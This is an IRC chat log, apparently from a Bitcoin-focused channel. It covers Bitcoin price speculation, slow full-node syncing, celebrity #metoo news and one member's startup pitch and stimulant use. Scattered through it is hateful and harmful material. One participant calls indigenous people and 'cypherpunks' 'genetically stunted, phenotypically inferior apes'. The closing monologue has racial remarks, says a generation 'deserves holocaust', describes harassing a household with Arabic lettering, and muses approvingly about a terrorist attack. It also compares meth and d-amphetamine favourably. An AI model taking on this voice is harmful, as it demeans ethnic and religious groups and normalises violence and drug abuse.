1744148;1511968449;mircea_popescu;totally worth it, at that. 1744149;1511968480;asciilifeform;which 2017 ? hypothetical bubbleocalypse ? 1744150;1511968487;*;mircea_popescu gets to forever recall how buffett was too scared to pick up glove, and cackle. 1744151;1511968497;mircea_popescu;asciilifeform well it did go up 10x, didn't it. 1744152;1511968544;asciilifeform;i'm not equipped to say whether this is a problem 1744153;1511968573;asciilifeform;( potentially -- lethal, potentially -- uninteresting, i have nfi ) 1744154;1511968589;mircea_popescu;" Consider that the market is currently pricing Bitcoin over 10k as a 114.19/73.69 sort of proposition. That's right : the open market valuation of the notion that Bitcoin will go over 10`000 USD this year is not so much worse than even odds." 1744155;1511968591;mircea_popescu;http://trilema.com/2014/an-era-ends-today-a-new-era-starts-today/#footnote_3_53302 1744156;1511968595;mircea_popescu;nevar fuhget. 1744157;1511968690;mircea_popescu;asciilifeform leaving reality aside, i can readily show in a snowglobe model how it's a problem. so, some indians (by which derrogatory term we denote genetically stunted, phenotypically inferior apes with some superficial semblance of humanity) had their "land" token inflated by events into great value cca 1600. 1744158;1511968703;mircea_popescu;as a result, they traded their valuable token AS A BLOC to other people. 1744159;1511968717;mircea_popescu;this trading as a bloc means, importantly, that the political and legal framework changes. 1744160;1511968825;mircea_popescu;the "cypherpunks" or "internet experts" or whatever you call the genetically stunted, phenotypically inferior apes depicted eg in http://trilema.com/2012/generatia-fara/ are not in any way different from those indians of yore. 1744161;1511968831;mircea_popescu;and in 2014 they still had too much bitcoin. 1744162;1511968877;mircea_popescu;in which sense, ethereum (not as the item, but as the prion set) is necessary for bitcoin to go into the millions. just a step on teh road. 1744163;1511969385;asciilifeform;extension of http://btcbase.org/log/2017-08-18#1699949 item ? 1744164;1511969385;a111;Logged on 2017-08-18 04:00 mircea_popescu: otherwise what, we'll be stuck in 2020 dealing with legacy yahoos ? noty. 1744165;1511969406;mircea_popescu;something like that. 1744166;1511969720;asciilifeform;ignoring for a moment the folly of formulating btc-usd as a scalar ( picture if somebody were to show up with a million-btc buy or sell, say ) -- i have nfi what the actual, honest number is , nor any clue as to where such a thing might even be hidden 1744167;1511969740;asciilifeform;yes a gox will give a plebe 10 ( 11? ) k if he comes in with 1. but beyond this. 1744168;1511969953;mircea_popescu;let's just say that the principal military function of leadership is the management of the enemy perception of weakness. 1744169;1511970373;asciilifeform;( ignoring for a moment the fact that if shitreich subject walks in with 1 btc, they will give 5k usd to him and 5k to clitler ) 1744170;1511970756;shinohai;id rather get 10k btc for me :D 1744171;1511970789;asciilifeform;'better to be rich and healthy, than poor and diseased' (tm)(r) 1744172;1511970958;shinohai;lolz 1744173;1511970974;shinohai; "height": 496710, 1744174;1511970975;shinohai; "last_fork_height": 495171, 1744175;1511970989;asciilifeform;lolwat?! 1744176;1511971000;asciilifeform;prbism ? 1744177;1511971020;asciilifeform;what means 'fork height' ? place of most recent reorg ? 1744178;1511971033;shinohai;curl https://api.blockcypher.com/v1/btc/main 1744179;1511971062;asciilifeform;that dun tell me what it is 1744180;1511971129;mircea_popescu;asciilifeform dudes implemented their own json thing. 1744181;1511971141;asciilifeform;... looks liek exactly what i thought, most-recent-reorg 1744182;1511971158;mircea_popescu;yes. 1744183;1511971171;shinohai;the "last_fork_height" = last reorg since whoever made most recent mooncoin 1744184;1511971202;asciilifeform;shinohai: looks like it's simply the most recent reorg their box saw, neh ? 1744185;1511971211;shinohai;yup 1744186;1511971232;asciilifeform;( getting this number from a trbtron is still a manual process. ) 1744187;1511971250;asciilifeform;fortunately if you have logging switched on, it's a straight grep 1744188;1511971281;shinohai;im trying to get block height from various sources (as experiment) this morning 1744189;1511971323;asciilifeform;oh try this unbelievable horror on for size : zoolag since http://btcbase.org/log/2017-08-19#1700485 is STILL syncing 1744190;1511971323;a111;Logged on 2017-08-19 00:13 asciilifeform: ACHTUNG panzers!! trb node 'zoolag' is back in business, this time as ordinary linux box -- syncing from 0 . same ip as prev. 1744191;1511971333;asciilifeform;this is a ssd box, on very reasonable fiber, no less. 1744192;1511971372;asciilifeform;461874 currently. 1744193;1511971388;asciilifeform;the sync mechanism is retarded beyond belief ( see l0gz ) 1744194;1511971406;asciilifeform;!#s rain mouth 1744195;1511971406;a111;4 results for "rain mouth", http://btcbase.org/log-search?q=rain%20mouth 1744196;1511971480;asciilifeform;as it is, that thing spends 99% of cpu filling up disk with the familiar ERROR: ConnectInputs() : d84dc3e02d mapTransactions prev not found f74a08a53a 1744197;1511971480;asciilifeform;ERROR: AcceptToMemoryPool() : ConnectInputs failed d84dc3e02d etc. 1744198;1511971482;mircea_popescu;not so terrible, 35k to go 1744199;1511971515;asciilifeform;14+ weeks !! 1744200;1511971524;mircea_popescu;we need bigger blocks. 1744201;1511971529;mircea_popescu;otherwise bitcoin can't be used. 1744202;1511971558;shinohai;100TB blox today 1744203;1511971664;asciilifeform;spends most of its time not having any notion that the next block exists. 1744204;1511971806;asciilifeform;( granted i could've filled it up with eatblock in <2days. but it's been some years since i synced 'from wild' and thought 'why not test..' ) 1744205;1511972173;mod6;<+asciilifeform> 461874 currently. << 492622 :: I'm gettin' closer! 1744206;1511973094;asciilifeform;mod6: when was yours born ? 1744207;1511973151;mod6;ugh, long time ago. 1744208;1511973166;mod6;took very long time to sync. but !ssd drive. 1744209;1511973170;asciilifeform;gotta supply both numerator and denominator, mod6 1744210;1511973173;asciilifeform;otherwise what do we have. 1744211;1511973189;mod6;im doin about 300-350 blocks per day or so now. 1744212;1511973204;asciilifeform;notbad 1744213;1511973495;diana_coman;hm, here I have one at 429437, started on 4th October; kind of got almost full data day by day, lol 1744214;1511973862;asciilifeform;all trb boxen where log wasn't cut off, have day-by-day, neh 1744215;1511974073;diana_coman;indeed 1744216;1511978883;BingoBoingo; this is a ssd box, on very reasonable fiber, no less. << I am very glad/sad that asciilifeform's sync from wild experiments are concordant with my own 1744217;1511978916;BingoBoingo;Espere por favor! 1744218;1511979110;BingoBoingo;And in other news, Conde Naste has decidedly quit the jet set: " Holiday gift guide 2017 — The 2017 Ars Technica gadget gift guide: On-the-go and travel tech edition We reflected on a year of testing to find the best tech for your next road trip." 1744219;1511979126;BingoBoingo;road trip, Road trip, Road Trip, ROAD TRIP! 1744220;1511979150;ben_vulpes;and garrison keillor falls to #metoo 1744221;1511979219;BingoBoingo;And their list... fucking idiot slabs and headphones 1744222;1511979228;BingoBoingo;ben_vulpes: Also... Matt Lauer 1744223;1511979240;asciilifeform;who are any of these 1744224;1511979269;asciilifeform;( srs q. i have nfi nor have any notion of why i should ) 1744225;1511979303;ben_vulpes;keillor ran a variety show for people afraid of vaginas on NPR forever 1744226;1511979310;ben_vulpes;lauer, no idea 1744227;1511979363;BingoBoingo;asciilifeform: They are emoticons of USian attempt at having a cultured. Matt Lauer is NBC's younger man hosting morning news show for older women. 1744228;1511979365;ben_vulpes;keillor was a liberal entertainment darling, right up there with ira glass for trophy of most inoffensive and least entertaining person that Everyone Agrees Is Just Amazing 1744229;1511979469;ben_vulpes;and the truuuuuly hilarious thing is that howard stern has yet to fall to the #metoo crowd (possibly won't?), which just goes to show that there is zero strength in the defense of being nice and appeasing the everyone. 1744230;1511979484;asciilifeform;wtf is '#metoo' 1744231;1511979494;BingoBoingo;Matt Lauer, was her demoocracy's bitch boy comforting the old biddies and making them feel relevant 1744232;1511979494;asciilifeform;and do i even want to find out 1744233;1511979560;ben_vulpes;it's the sekuhara fire sweeping la nacion! 1744234;1511979574;trinque;#metoo is the noise twatters make when you grab 'em by the pussy 1744235;1511979598;asciilifeform;mega-summary 1744236;1511979600;BingoBoingo;Meh, in other WMAF http://www.psywarrior.com/JapanPSYOPWW2.html 1744237;1511979608;ben_vulpes;"sekuhara" being the noise little japanese girls emitted in storms of arousal when i played in japan as a youf 1744238;1511979652;asciilifeform;BingoBoingo: mp's fdr is prominently missing 1744239;1511979803;asciilifeform;( grrr, where is the link! it's a jpeg, on trilema somewhere ! ) 1744240;1511979805;asciilifeform;!!up gabriel_laddel 1744241;1511979805;deedbot;gabriel_laddel voiced for 30 minutes. 1744242;1511979846;gabriel_laddel;https://pastebin.com/2xRZEVbx 1744243;1511979861;asciilifeform;wassat 1744244;1511979942;gabriel_laddel; http://btcbase.org/log/2017-11-28#1743639 << Huzzah! 1744245;1511979942;a111;Logged on 2017-11-28 12:58 mircea_popescu: and speaking of which, http://btcbase.org/log/2017-11-28#1743518 prolly needs to be addressed better than the original "i wouldn't give a shit" : i'm ready to take over the governance of the entire world from the hands of the inept pretenders of today, as of yesterday. the result would be very ~different~, yes, but that's irrelevant. 1744246;1511979952;asciilifeform;hey gabriel_laddel is that yours ? 1744247;1511979971;gabriel_laddel;ya 1744248;1511979978;asciilifeform;'Antecedent companies are iRobot (ie roomba. founded 1990, IPO $100MN in 2005 at 24/share), Neato (raised 45MN, 2005, acquired by 'Vorwork', a German household appliances firm this Sept. Fiscal details unavailable). Both ventures attempted an 'AI' ...' << what means 'antecedent ventures' ? 1744249;1511979999;asciilifeform;and i must disagree, 'neato''s vacuum cleaner worx pretty great. 1744250;1511980011;asciilifeform;i have several, in various places 1744251;1511980035;asciilifeform;( will gripe, but not about the firmware -- the roller bearing overheats ) 1744252;1511980053;gabriel_laddel;antecedent ventures == those who failed to venture far enough 1744253;1511980070;gabriel_laddel;and thanks for input re Neato 1744254;1511980081;asciilifeform;how does a cad proggy compete with vaccuum co tho 1744255;1511980082;asciilifeform;i dun get it 1744256;1511980083;trinque;gabriel_laddel: you're sharting up a biz? 1744257;1511980090;asciilifeform;also can see this cad ? or hypothetical yet 1744258;1511980147;gabriel_laddel;totally hypothetical, I'm just sticking this on the end of "gimme job plz" emails along with some connective tissue 1744259;1511980159;asciilifeform;btw gabriel_laddel there is a massive unfilled hole in cad-dom , 1744260;1511980170;asciilifeform;!#s from:asciilifeform eagle 1744261;1511980170;a111;33 results for "from:asciilifeform eagle", http://btcbase.org/log-search?q=from%3Aasciilifeform%20eagle 1744262;1511980176;asciilifeform;!#s from:asciilifeform pcb cad 1744263;1511980176;a111;2 results for "from:asciilifeform pcb cad", http://btcbase.org/log-search?q=from%3Aasciilifeform%20pcb%20cad 1744264;1511980184;asciilifeform;^ there does not currently exist a decent pcb cad. at. all. 1744265;1511980213;gabriel_laddel;afaict, the lack of a CAD program to input the clean routines is the only reason I get interrupted by cleaners in whatever lounge I happen to be working in 1744266;1511980215;asciilifeform;there's an ancient and now-unsupported closed warez turd. and a buncha open sores that dun work ~at all. ( on linux, i dun give a fuck what exists for microshit ) 1744267;1511980228;gabriel_laddel;or maybe neato allows more fine-grained control than I am aware of 1744268;1511980273;asciilifeform;gabriel_laddel: 'neato' vacuum doesn't do the random walk thing, it laser-scans the surrounding room (1d) and does edges, then colours 'in' the insides. pretty predictable. 1744269;1511980289;gabriel_laddel;oh thank G-d 1744270;1511980310;asciilifeform;( even the places where it will get stuck, are quite predictable. one sticks magnetic rubber to the floor, it has reed switch and avoids ) 1744271;1511980317;asciilifeform;!!up gabriel_laddel 1744272;1511980318;deedbot;gabriel_laddel voiced for 30 minutes. 1744273;1511980324;gabriel_laddel;-_- 1744274;1511980325;asciilifeform;did it run over yer ethernet cord 1744275;1511980344;gabriel_laddel;I switched from colemak back to qwerty 1744276;1511980347;gabriel_laddel;keep fking up 1744277;1511980404;asciilifeform;gabriel_laddel: see also, http://btcbase.org/log/2014-12-01#939225 1744278;1511980404;a111;Logged on 2014-12-01 02:29 asciilifeform experimented with dvorak a few times over the years, found that he doesn't enter enough human language text to make the effort worthwhile 1744279;1511980426;trinque;what's the point of putting a company pitch in a cover letter for another job? 1744280;1511980439;trinque;other than tweaker bouncing all over the map? 1744281;1511980442;asciilifeform;not sure when i last did something where kbd speed was remotely the bottleneck. 1744282;1511980465;gabriel_laddel;asciilifeform has to do with my hand hurting from overuse 1744283;1511980471;asciilifeform;trinque: possibly this is the culture in his monkeystan, it sounds familiar 1744284;1511980480;asciilifeform;'list yer failed companies' 1744285;1511980491;trinque;every speed head gets high, thinks he's gonna take on all the things 1744286;1511980496;gabriel_laddel; http://btcbase.org/log/2017-11-29#1744264 < ty for pointer, did not grok this from logs 1744287;1511980496;a111;Logged on 2017-11-29 18:29 asciilifeform: ^ there does not currently exist a decent pcb cad. at. all. 1744288;1511980513;gabriel_laddel;trinque have not used in ~week 1744289;1511980523;gabriel_laddel;fu am going to take on all the things anyways 1744290;1511980542;trinque;doesn't matter; your behavior is wrapped around it. probably one of those kids given speed pills instead of parenting. 1744291;1511980549;gabriel_laddel;but beyond that, I was applying to accelerators with this company because I don't want a real job 1744292;1511980561;trinque;you are not in a position to declare what you want. 1744293;1511980575;gabriel_laddel;plus was listing off interesting things you could build with masamune 1744294;1511980576;ben_vulpes;dude the best thing you could be doing right now is living out of a shoebox and extracting as many dollars from the sv machine to turn into btc as you possibly can. 1744295;1511980594;gabriel_laddel;I don't want to hold btc until the inversion happens 1744296;1511980597;asciilifeform;ben_vulpes: sounds like what he already does neh 1744297;1511980610;asciilifeform;waiwat inversion 1744298;1511980610;ben_vulpes;asciilifeform: he doesn't extract cash as far as i can tell 1744299;1511980614;ben_vulpes;gabriel_laddel: inversion? 1744300;1511980625;gabriel_laddel;ben_vulpes yer right regarding the lack of cash... 1744301;1511980693;gabriel_laddel;ben_vulpes yeah -- when suddenly the _general public_ (ie gov/cia/fbi pensioners) realizes they need to hold btc and come to beat it out of whoever 1744302;1511980718;asciilifeform;trinque: also thread http://btcbase.org/log/2016-12-01#1575702 1744303;1511980718;a111;Logged on 2016-12-01 18:19 asciilifeform: but quite destructive to folx who are doing equivalent of ~planning~ the march 1744304;1511980725;gabriel_laddel;I aim to use btc AFTER that whole ugly period 1744305;1511980726;ben_vulpes;gabriel_laddel: man cannot operate from basis of fear 1744306;1511980736;asciilifeform;gabriel_laddel: elaborate re 'ugly period' 1744307;1511980757;ben_vulpes;eh i don't care to engage in these hallucinations 1744308;1511980758;asciilifeform;and re how 'gov pensioner' is to hold btc ( not to be confused with 'gox holds btc for idjit pensioners' which afaik already happens today ) 1744309;1511980760;trinque;this whole thing is the tweaker's "am fine, everything's fine" loop. only reason he comes by 1744310;1511980763;gabriel_laddel;ben_vulpes I'm not afraid, just not particularly adept with guns/poison 1744311;1511980764;asciilifeform;nah let's here 1744312;1511980765;trinque;"look, am smart and doing things" 1744313;1511980767;asciilifeform;*hear 1744314;1511980792;trinque;gabriel_laddel: name one thing you've "aimed" to do and done? 1744315;1511980846;gabriel_laddel;trinque 1. get a job at startup without having graduated from anything ever, with no network (CHECKMARK) 1744316;1511980862;gabriel_laddel;2. build masamune, sell (CHECKMARK) 1744317;1511980873;ben_vulpes;all i see is the same old same fuckin old excuses for not having the readies and willingness to do what it takes to operate a full node 1744318;1511980885;trinque;and any of this is relevant to the republic how 1744319;1511980886;asciilifeform;gabriel_laddel: who do you suppose will come to beat you for btc ? and why , e.g., BingoBoingo , ben_vulpes , asciilifeform , trinque , not yet beaten 1744320;1511980911;gabriel_laddel;asciilifeform because the coke-selling part of the CIA has not yet wanted to own btc 1744321;1511980916;asciilifeform;beaten for usd ? check, every 2 wks, every time i get a cheque lol 1744322;1511980948;asciilifeform;gabriel_laddel: why would you suppose it not yet ? 1744323;1511980978;asciilifeform;if you have a good proper coke biznis why wouldja walk around shaking down plebes for lunch money. 1744324;1511980980;gabriel_laddel;asciilifeform gut instinct + talking to people out here + overhead conversations 1744325;1511981005;trinque;if he spent any time stabilizing his life, he wouldn't have the urgency that excuses the drug habits 1744326;1511981020;trinque;not that I see any point in the 300th rehash of gabriel_laddel 1744327;1511981027;gabriel_laddel;"stabilizing time" == building a castle 1744328;1511981037;ben_vulpes;b-but building a fortress and carving a domain of sovereignty out is antithetical to the digital nomad ideal, trinque ! 1744329;1511981040;trinque;yes, the splitting is also a speed user thing 1744330;1511981044;asciilifeform;trinque: erudite madness is educational. 1744331;1511981058;gabriel_laddel;where was the thread where MP notes the only stable life is in ransacking other's castles... 1744332;1511981086;asciilifeform;'stable' is a mirage, everybody dies of sumpthin. 1744333;1511981087;trinque;lol, what do you do, hobble up to the door and knock, ask for change? 1744334;1511981288;asciilifeform;i'd like to hear where gabriel_laddel intends to put the castle 1744335;1511981309;gabriel_laddel;asciilifeform wait what. I intend no such thing 1744336;1511981315;asciilifeform;hm 1744337;1511981329;gabriel_laddel;I specifically have no intent to hold btc until after some people get murdered for it 1744338;1511981366;gabriel_laddel;"yer not a man then!" OK ya, am total wage slave / bitch to someone willing to kill for it. fine by me 1744339;1511981384;asciilifeform;from what does gabriel_laddel conclude that no one's been murdered quite yet ? 1744340;1511981414;asciilifeform;e.g. that chick who was thrown from 14th floor in singapore , when was it, 3y ago 1744341;1511981426;asciilifeform;ran a gox, wouldn't play ball, etc 1744342;1511981450;asciilifeform;or the 'dpr' d00d, who may as well be dead for all i know 1744343;1511981508;asciilifeform;possibly gets flayed and regrown every week, like prometheus and his eagles, and spitting out privkeyz a bit in a month at a time 1744344;1511981543;gabriel_laddel;asciilifeform anyway I respond it'll boil down to "gut instinct". And that's fine, because we've all got different T levels, peni lengths, brain structures, heights and this determines what you're up for / can do. 1744345;1511981565;asciilifeform;no q was re specifically how gabriel_laddel pictures 'axe time, sword time' 1744346;1511981579;asciilifeform;i'm a connoisseur meself, would like to hear his ver. 1744347;1511981607;gabriel_laddel;Oh I think I'll hear fear / desperation in the voice of one of these government people while getting a coffee. 1744348;1511981650;BingoBoingo; trinque have not used in ~week << AHA, the extended phase of withdrawal! 1744349;1511981654;gabriel_laddel;Some panic'd phrasing of "my USD investments are worthless!" 1744350;1511981663;gabriel_laddel;BingoBoingo meth has no withdraw 1744351;1511981665;gabriel_laddel;read more 1744352;1511981668;asciilifeform;let's rewind a bit back to the last reich -- picture 'i dun wanna hold any diamonds, gold, until the nazis go away' 1744353;1511981686;asciilifeform;'what if gestapo gets hold of me' 1744354;1511981697;asciilifeform;the diamonds might not help, but how do they hurt. 1744355;1511981720;gabriel_laddel;asciilifeform palintir is right around corner from me. if I hear them discussing how to track down someone from btc addy over lunch == axe time sword time 1744356;1511981744;asciilifeform;let's expand on this 1744357;1511981763;asciilifeform;picture yerself as the fuhrer. how would you go about 'track down someone from btc addy' ? 1744358;1511981865;BingoBoingo; but beyond that, I was applying to accelerators with this company because I don't want a real job << Sometime at a "real job" would be good for you. Work at BingoBoingo store, call it "field research" if that makes Brian in the head feel better. Show up, bust your ass, eat shit, THEN ask yourself "Why wasn't I working this hard for myself before?" 1744359;1511981865;gabriel_laddel;yo it'll sound like a bunch of excited / nervous engineering types discussing IP addresses, fake names & locations over lunch 1744360;1511981890;gabriel_laddel;or something. but I know I've not seen it yet. 1744361;1511981944;BingoBoingo; BingoBoingo meth has no withdraw << It has a withdrawl syndrome. Not at all like opiates or alcohol. More subtle, treacherous thing. 1744362;1511981960;asciilifeform;gabriel_laddel: no but let's work this out. gabriel_laddel generates an addr. pgps it to e.g. asciilifeform . who sends to it a coin. how does hitler find that 1) addr belongs to gabriel_laddel 2) where to find and rectothermally rebuke gabriel_laddel 1744363;1511981973;gabriel_laddel;BingoBoingo do tell since clearly you know more about clean mexican meth than I do. 1744364;1511981988;gabriel_laddel;(incidentally d-amphetamine is WAY BETTER than meth) 1744365;1511982007;asciilifeform;gabriel_laddel: better how ? 1744366;1511982012;asciilifeform;now i'm curious 1744367;1511982084;gabriel_laddel;asciilifeform regarding addy: you're looking at this the wrong way -- people with shit security ALREADY hold btc. And tracking me down is easy. Can come find me anyday in PA. 1744368;1511982098;BingoBoingo;gabriel_laddel: When one takes ANY stimulant catecholamine drug, neurons start growing more receptors to handle the extra shit sticking around then (aka receptor upregulation, this provides tolerance). When you cease the stims, it takes substantial time for the receptors to downregulate again. 1744369;1511982123;gabriel_laddel;BingoBoingo hur dur mind altering substances alter the mind. 1744370;1511982130;asciilifeform;!!up gabriel_laddel 1744371;1511982131;deedbot;gabriel_laddel voiced for 30 minutes. 1744372;1511982132;BingoBoingo;!!up gabriel_laddel 1744373;1511982132;deedbot;gabriel_laddel voiced for 30 minutes. 1744374;1511982135;gabriel_laddel;this is not withdraw 1744375;1511982150;BingoBoingo;gabriel_laddel: It is a form of withdrawal. 1744376;1511982165;gabriel_laddel;gtfo or do more drugs 1744377;1511982173;gabriel_laddel;You have no idea 1744378;1511982176;asciilifeform;i betcha the d00d know what he got into. 1744379;1511982183;BingoBoingo;In the severly afflicted like little miss trainwreck it proves rather debilitating 1744380;1511982192;asciilifeform;as i understand gabriel_laddel has 3-5 yrs to live, if typical dose. 1744381;1511982204;ben_vulpes;BingoBoingo: lmt is a mether? 1744382;1511982209;gabriel_laddel;What, pray tell, did she take, and for how long, and how clean, and by what ROA? 1744383;1511982210;asciilifeform;ought to make good use of it. 1744384;1511982210;BingoBoingo;ben_vulpes: Was 1744385;1511982230;trinque;eh when the shadow people show up, gabriel_laddel can give them jobs in his startup 1744386;1511982237;ben_vulpes;BingoBoingo: boozer too? 1744387;1511982271;ben_vulpes;miscagenation of the 12-steppers! 1744388;1511982279;BingoBoingo;ben_vulpes: Well, yes. This is what much of my extended meatwot network has become. People who stopped drink/dope and are at various rebuilding stages 1744389;1511982329;BingoBoingo;But yes, most people when drinking and drugging at problem level don't cleanly separate drink and drug 1744390;1511982350;*;gabriel_laddel doesn't drink fwiw. 1744391;1511982362;ben_vulpes;ain't about you, buddy. 1744392;1511982411;ben_vulpes;BingoBoingo: i did not know that the networks cross-pollinated but it makes a great deal of sense 1744393;1511982418;*;BingoBoingo has only met one "clean productivity mether" who tried the recovery thing. Bounced in/out and then allegedly a heated argument did in his cardiovascular system 1744394;1511982460;asciilifeform;BingoBoingo: what was 'clean productivity', gotta wonder 1744395;1511982469;BingoBoingo;ben_vulpes: Well, opiate crisis. AA and NA offer same problem s/alcoholism/addiction 1744396;1511982476;BingoBoingo;asciilifeform: Academi-wank 1744397;1511982492;asciilifeform;patron saint of intellectual dopers, paul erdos , took such small doses that a typical american would not even feel 1744398;1511982533;asciilifeform;( i.e. milligrams ) 1744399;1511982554;BingoBoingo;milligrams are generally what these things are measured in 1744400;1511982565;gabriel_laddel;asciilifeform d-amph is better in that it far less physical, doesn't cause oxidative stress, isn't as much of a "scheming" high and won't make you tweak to the point of tripping face. 1744401;1511982584;asciilifeform;hm looks like i am unequipped to process gabriel_laddel's summary 1744402;1511982595;asciilifeform;not knowing what is a 'scheming high' or 'tripping face' 1744403;1511982608;asciilifeform;or for this matter 'to tweak' 1744404;1511982620;asciilifeform;do i need to do some time in a dope den , to learn this ? 1744405;1511982629;gabriel_laddel;nah, one sec 1744406;1511982700;asciilifeform;( http://btcbase.org/log/2017-11-24#1742899 for instance ) 1744407;1511982700;a111;Logged on 2017-11-24 06:34 gabriel_laddel: then -- BLAM. Tweaking. 1744408;1511982725;asciilifeform;i;ma guess it's an unwanted effect ? 1744409;1511982835;gabriel_laddel;Nono, just different. Fuck can't find the link -- but anyways, I had the idea that it'd be easier to hold a lightbulb over my head and head out on a Sat. night in sf than to network with people one by one 1744410;1511982860;asciilifeform;waiwat?! 1744411;1511982864;asciilifeform;light bulb? 1744412;1511982869;gabriel_laddel;then did that -- for 3-6 hours in the dead of night. Some guy offered me his sister's hand in marriage. 1744413;1511982888;asciilifeform;didja take it? 1744414;1511982913;BingoBoingo; do i need to do some time in a dope den , to learn this ? << I have been suggested you visit an AA/NA meeting for some time to meet people 1744415;1511982950;asciilifeform;dun i gotta take to drink 1st, and then quit..? 1744416;1511982990;gabriel_laddel;lolno. But when you "tweak" the ideas in your head start to drive rather than sane human things like "I shouldn't be fooling around with these love-glasses and the way they make the girls look in broad daylight" go out the window. 1744417;1511982995;BingoBoingo;Tradition 3: The only requirement for membership is a desire to stop drinking. Doesn't say for how long... 1744418;1511983056;asciilifeform;lol 1744419;1511983065;gabriel_laddel;http://www.robssuperhappyfunstore.com/toyfireworksheartsx50-002483.html < love-glasses 1744420;1511983089;asciilifeform;lol never before heard of such a thing. 1744421;1511983097;asciilifeform;must be a californilandia thing 1744422;1511983160;asciilifeform;gabriel_laddel: taking performance dope, when you dun have any aim, is rather like swinging a hammer wildly around your room, where there are no nails to pound 1744423;1511983166;*;BingoBoingo wonder what gabriel_laddel's objection to cocaine was, it's a natural botanical and reportedly fairly cheap compared to historically 1744424;1511983168;asciilifeform;likely to end badly 1744425;1511983206;asciilifeform;BingoBoingo: possibly he valued his nose ? 1744426;1511983234;BingoBoingo;There's other routes to administer 1744427;1511983247;asciilifeform;dun think it's very active orally ? 1744428;1511983248;asciilifeform;iirc 1744429;1511983262;gabriel_laddel;asciilifeform nah. understanding through observation can be performance-enhanced. is useful too. 1744430;1511983275;asciilifeform;!#s a smell of petrol pervades throughout 1744431;1511983275;a111;0 results for "a smell of petrol pervades throughout", http://btcbase.org/log-search?q=a%20smell%20of%20petrol%20pervades%20throughout 1744432;1511983277;asciilifeform;hmm. 1744433;1511983281;asciilifeform;!~google a smell of petrol pervades throughout 1744434;1511983282;jhvh1;asciilifeform: Quote by Bertrand Russell: “William James describes a man who got ...: ; Secret of the Universe: A Strong Smell of Turpentine Prevails ...: ; to spread over an area - synonyms and related words | Macmillan ...: (1 more message) 1744435;1511983289;asciilifeform;turpentine, it was. 1744436;1511983300;asciilifeform;re 'understanding'. 1744437;1511983325;BingoBoingo; dun think it's very active orally ? << Could make a chewing gum or sublingual tablet 1744438;1511983331;asciilifeform;let's for the l0gz : 1744439;1511983337;asciilifeform;'William James describes a man who got the experience from laughing-gas; whenever he was under its influence, he knew the secret of the universe, but when he came to, he had forgotten it. At last, with immense effort, he wrote down the secret before the vision had faded. When completely recovered, he rushed to see what he had written. It was : “A smell of petroleum prevails throughout.” ' 1744440;1511983338;gabriel_laddel;I have to move because people are coming into the room, but will drop an actual story with details here in a sec, or at least PM to you ascii 1744441;1511983344;asciilifeform;plz dun pm 1744442;1511983351;asciilifeform;i very rarely read pm. post in-chan. 1744443;1511983375;trinque;I fail to see the fascination here 1744444;1511983406;asciilifeform;trinque: i suppose you dun think those priests who set themselves on fire , were interesting either 1744445;1511983414;*;trinque can walk a few blocks and watch bums get high at pleasure 1744446;1511983420;trinque;doesn't appeal 1744447;1511983434;trinque;asciilifeform: can't compare that level of discipline to this 1744448;1511983441;BingoBoingo;trinque: Maybe he hits bottom, finds a sponsor to guide him through steps, becomes useful? 1744449;1511983476;asciilifeform;trinque: what discipline. petrol, match. 1744450;1511983488;asciilifeform;whereas scoring, weighing, purifying dope, while knowing what you signed up for -- discipline. 1744451;1511983491;asciilifeform;as i understand. 1744452;1511983509;trinque;asciilifeform: one of whom I'm thinking sat peacefully as he burned 1744453;1511983549;asciilifeform;http://trilema.com/2014/the-all-american-asshole-in-his-own-words-with-my-own-notes/#selection-2959.0-2975.867 << see also 1744454;1511983552;trinque;gabriel_laddel can't sit peacefully and he's not even combusting 1744455;1511983674;*;asciilifeform bbl,meat 1744456;1511984698;BingoBoingo;!!up gabriel_laddel 1744457;1511984699;deedbot;gabriel_laddel voiced for 30 minutes. 1744458;1511989833;asciilifeform;!!up gabriel_laddel 1744459;1511989834;deedbot;gabriel_laddel voiced for 30 minutes. 1744460;1511989863;asciilifeform;gabriel_laddel: have some patience, ffs, post things in-chan 1744461;1511989879;gabriel_laddel; An effective summary of d-amph: it works, you're in control it and has no comedown (due to l-amph in adderal). Whereas meth (again no negative comedown aside from sleep & need to eat like pregnant (with ideas?)) will grab your conciousness and irreversiby chain it to your own interests in the span of 5-15 minutes. Anyone rambling about how 'pleasu 1744462;1511989879;gabriel_laddel;rable' it is simply has no academic interests & probably spends most of their time seeking or finding sexual release (ie #tweaker nation tumblr females. Notice, very few post about meth and the read much closer to 'Ive no purpose, need to reproduce, NOW. What you like meth? OKAYSUREWHATEVERMETOOJUSTFUCKMEALREADY'). The catch however is that you've 1744463;1511989880;gabriel_laddel;not a choice in the matter. A state of (Csikszentmihalyi) flow - forgetting to eat, drink, sitting in one position beyond any reasonable limit - we all do this when thinking anyways, but it can be interupted. When you remove the very notion of interruption what you're left with is tweaking, which is an awful lot like being enslaved, perfectly, by a 1744464;1511989880;gabriel_laddel;n idea, or some form of sensory input bodily electrical resonance. MP's 'women are only useful as slaves' comes to mind. Are men only useful when tweaking? 'Bennies' were readily available at Los Alamos during MP. Did no-sleep-drive-and-read-johnny use? I can't find primary sources and am also digressing... Tweaking. Something WILL grab your intere 1744465;1511989881;gabriel_laddel;st, strip you of giving a fuck and you're off. 1744466;1511989881;gabriel_laddel;Example: had the thought -- ~ _someone, somewhere_ in this godforsakken sodom must have an imagination, and a curiosity to match it! So I took a light bulb, placed it above my head like a cartoon 'idea emoji' and walked all of SF many times over trying to elicit some sort of novel reaction from the fri night 'partygoers' (ED NOTE: sf is a nursing h 1744467;1511989882;gabriel_laddel;ome and a weekend nights end at like 11pm because my generation deserves holocaust). This involved dancing around all over the place, even going so far as to pull out my computer & code onehanded, balancing on one foot, bobbing like a maniac, with lightbulb affixed. Honest to god, I can't tell you if ANYONE even lives in the whole western half of t 1744468;1511989882;gabriel_laddel;he city, because I didn't see a soul four hours (maybe two, idk). Found a doorbell with arab lettering and rang it furiously. I hope it disturbed them something awful anddsfsdfsdfewdshdslkhfdslhlkjfdshdskjfhds AHEM. Wasn't thinking that at the time, but a terrorist attack & subsequent rebuild seems more likely than any other route to improved publi 1744469;1511989883;gabriel_laddel;c infrastructure in CA. Easy enough to calculate. 1744470;1511989883;gabriel_laddel;Anyways there are no imaginative+curious people in SF, but the guy offering his sister had the right idea. Hm. Actually there was one now that I think about it. Two if you count the negro "man, I need some of what you've got". Fuck yeah Black America. Better showing than whitey. 1744471;1511989911;asciilifeform;woah, gabriel_laddel have you considered... blog 1744472;1511989940;gabriel_laddel;MP is the MP of our generation 1744473;1511990037;gabriel_laddel;asciilifeform: https://www.quora.com/profile/Jeff-SKT 